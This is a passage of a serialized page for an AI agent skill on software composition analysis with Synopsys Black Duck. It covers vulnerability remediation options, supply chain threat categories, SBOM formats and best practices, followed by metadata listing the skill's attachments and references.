feasible","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Replace","type":"text","marks":[{"type":"strong"}]},{"text":": Switch to alternative component without vulnerability","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Mitigate","type":"text","marks":[{"type":"strong"}]},{"text":": Implement workarounds or compensating controls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Accept","type":"text","marks":[{"type":"strong"}]},{"text":": Document risk acceptance with business justification","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Supply Chain Security","type":"text"}]},{"type":"paragraph","content":[{"text":"See ","type":"text"},{"text":"references/supply_chain_threats.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for comprehensive coverage of:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Dependency confusion attacks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Typosquatting and malicious packages","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Compromised maintainer accounts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Backdoored dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Unmaintained and abandoned projects","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SBOM Generation and Management","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck supports standard SBOM formats:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CycloneDX","type":"text","marks":[{"type":"strong"}]},{"text":": Modern, machine-readable format for vulnerability management","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SPDX","type":"text","marks":[{"type":"strong"}]},{"text":": ISO/IEC standard for software package data exchange","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Use SBOMs for:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Supply chain transparency","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Regulatory compliance (Executive Order 14028)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incident response (rapid vulnerability identification)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"M&A due diligence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Best Practices","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Shift Left","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate SCA early in development lifecycle","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Policy-Driven","type":"text","marks":[{"type":"strong"}]},{"text":": Define clear policies for vulnerabilities and licenses","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Continuous Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Run scans on every commit and nightly for production","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Remediation Prioritization","type":"text","marks":[{"type":"strong"}]},{"text":": Focus on exploitable vulnerabilities first","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SBOM Management","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain up-to-date SBOM for all production applications","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Supply Chain Hygiene","type":"text","marks":[{"type":"strong"}]},{"text":": Regularly review dependency health and maintainability","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"License Compliance","type":"text","marks":[{"type":"strong"}]},{"text":": Establish license approval process before adoption","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Defense in Depth","type":"text","marks":[{"type":"strong"}]},{"text":": Combine SCA with SAST, DAST, and security testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Black Duck Documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Black Duck Detect","type":"text","marks":[{"type":"link","attrs":{"href":"https://sig-product-docs.synopsys.com/bundle/integrations-detect/page/introduction.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP Dependency-Check","type":"text","marks":[{"type":"link","attrs":{"href":"https://owasp.org/www-project-dependency-check/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"National Vulnerability Database","type":"text","marks":[{"type":"link","attrs":{"href":"https://nvd.nist.gov/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SBOM Standards (CISA)","type":"text","marks":[{"type":"link","attrs":{"href":"https://www.cisa.gov/sbom","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CycloneDX SBOM Standard","type":"text","marks":[{"type":"link","attrs":{"href":"https://cyclonedx.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SPDX License List","type":"text","marks":[{"type":"link","attrs":{"href":"https://spdx.org/licenses/","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"sca-blackduck","tags":["sca","blackduck","dependency-scanning","vulnerability-management","license-compliance","supply-chain","cve","owasp"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/sca-blackduck/SKILL.md","repo_owner":"aiskillstore","body_sha256":"d6d5880e25805a76989e89900bba7dcfe31bb5114a649b859e8eb8cc9b442506","cluster_key":"2fa2d969a21fc303147cead518da991ab4f7b14477542116c28b3346d4d62b3d","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/sca-blackduck/SKILL.md","attachments":[{"id":"240e0490-0fe8-5521-93e1-172d19474efe","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/240e0490-0fe8-5521-93e1-172d19474efe/attachment.yml","path":"assets/blackduck_config.yml","size":4584,"sha256":"f0449e0111a2e45ead976a56fb161bcb92cb86c5c087332bed0a77797a9ceb4b","contentType":"application/yaml; charset=utf-8"},{"id":"c3ccd1a5-1fc8-52e8-a159-06ffd018c49b","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c3ccd1a5-1fc8-52e8-a159-06ffd018c49b/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"a03efd90-f745-50ab-9702-05d96039efcc","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/a03efd90-f745-50ab-9702-05d96039efcc/attachment.yml","path":"assets/ci_integration/github_actions.yml","size":5239,"sha256":"ff919148fab86d7cb701ad2b30a8bde678164bbabe066f499c5b1d6a4f8ca730","contentType":"application/yaml; charset=utf-8"},{"id":"df081f82-8ca4-5556-9c7b-8bd533c4a694","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/df081f82-8ca4-5556-9c7b-8bd533c4a694/attachment.yml","path":"assets/ci_integration/gitlab_ci.yml","size":6043,"sha256":"6c1dc666f3d60883306e24125457241c64d26954a6d834eafa25f7e0fdf54577","contentType":"application/yaml; charset=utf-8"},{"id":"99477cd2-0fca-5043-b4ac-06ea035e3be4","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/99477cd2-0fca-5043-b4ac-06ea035e3be4/attachment.groovy","path":"assets/ci_integration/jenkins_pipeline.groovy","size":11350,"sha256":"f52bcf94f468dcfd210948d804599c7116b711b24b7812663fb8b3644383e578","contentType":"text/plain; charset=utf-8"},{"id":"4a2a12b3-d335-55e8-8aff-a04ecbe05aee","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/4a2a12b3-d335-55e8-8aff-a04ecbe05aee/attachment.json","path":"assets/policy_templates/security_policy.json","size":4644,"sha256":"c851cf1d2927d8972bf919260a252d1c0918fd67ede30f654a006b5520131072","contentType":"application/json; charset=utf-8"},{"id":"fb4fac78-6c4b-5e0b-9f7c-d090676c29f6","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/fb4fac78-6c4b-5e0b-9f7c-d090676c29f6/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; charset=utf-8"},{"id":"6031c3d7-2429-5c6b-9004-9325853b1729","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/6031c3d7-2429-5c6b-9004-9325853b1729/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; charset=utf-8"},{"id":"5b0b13a1-e5ff-5a7a-b814-0357c26b5390","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5b0b13a1-e5ff-5a7a-b814-0357c26b5390/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; charset=utf-8"},{"id":"eeef023c-a4e9-5274-ae7b-be68935ccda8","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/eeef023c-a4e9-5274-ae7b-be68935ccda8/attachment.md","path":"references/cve_cwe_owasp_mapping.md","size":9475,"sha256":"17d1342a46bc079ce645f890b7fbbb33207a4086c550f7ccd5d2200895b85171","contentType":"text/markdown; charset=utf-8"},{"id":"340044d4-5b58-5e36-9f39-9442fa5faec9","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/340044d4-5b58-5e36-9f39-9442fa5faec9/attachment.md","path":"references/license_risk_guide.md","size":12725,"sha256":"d6cc3eb15ff779116aa093f5e05c1ff10c7747a467b3baf596f217b424568016","contentType":"text/markdown; charset=utf-8"},{"id":"48dcf247-70ba-5f67-8140-082544169d11","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/48dcf247-70ba-5f67-8140-082544169d11/attachment.md","path":"references/remediation_strategies.md","size":13491,"sha256":"b4ae33edff44fe8faec0dc77575ab61bc902c507a19aa8de42c13c44ecb0d3b7","contentType":"text/markdown; charset=utf-8"},{"id":"fa67d8b1-a803-5b36-a86b-ea695efc2bc0","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/fa67d8b1-a803-5b36-a86b-ea695efc2bc0/attachment.md","path":"references/supply_chain_threats.md","size":16454,"sha256":"f94b46eaa88b5b7464264e0d0f313e7cb52880ff501055f6be171a40c04ad6ea","contentType":"text/markdown; charset=utf-8"},{"id":"9e219d50-df9e-53cd-b52d-ae9f1b965e2e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9e219d50-df9e-53cd-b52d-ae9f1b965e2e/attachment.json","path":"skill-report.json","size":13114,"sha256":"1a9e2bdcfe95d0526c3ff5aa16fe67468b94bb9040e21bdd010b06f22551a0f2","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"1bea53e359c98b1cb69ef8e4775a1313a801fd4d254c03192588b85667af1899","attachment_count":14,"text_attachments":13,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":1,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/sca-blackduck/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","frameworks":["OWASP","CWE","NIST","SOC2","PCI-DSS"],"import_tag":"clean-skills-v1","maintainer":"SirAppSec","references":["https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html","https://owasp.org/www-project-dependency-check/","https://nvd.nist.gov/","https://www.cisa.gov/sbom"],"description":"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabilities, license compliance risks, and supply chain security threats with CVE, CWE, and OWASP framework mapping. Use when: (1) Scanning dependencies for known vulnerabilities and security risks, (2) Analyzing open source license compliance and legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply chain security risks and third-party component threats.\n","dependencies":{"tools":["docker","git","detect"],"access":["blackduck-url","api-token"]}}},"renderedAt":1782988640366}

Software Composition Analysis with Black Duck Overview Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify security vulnerabilities, license compliance risks, and supply chain threats in open source dependencies. This skill provides automated dependency scanning, vulnerability detection with CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards. Quick Start Scan a project for dependency vulnerabilities: Scan with policy violation enforcement: Core Workflows Workflow 1: Initial Dependency Security Assessme…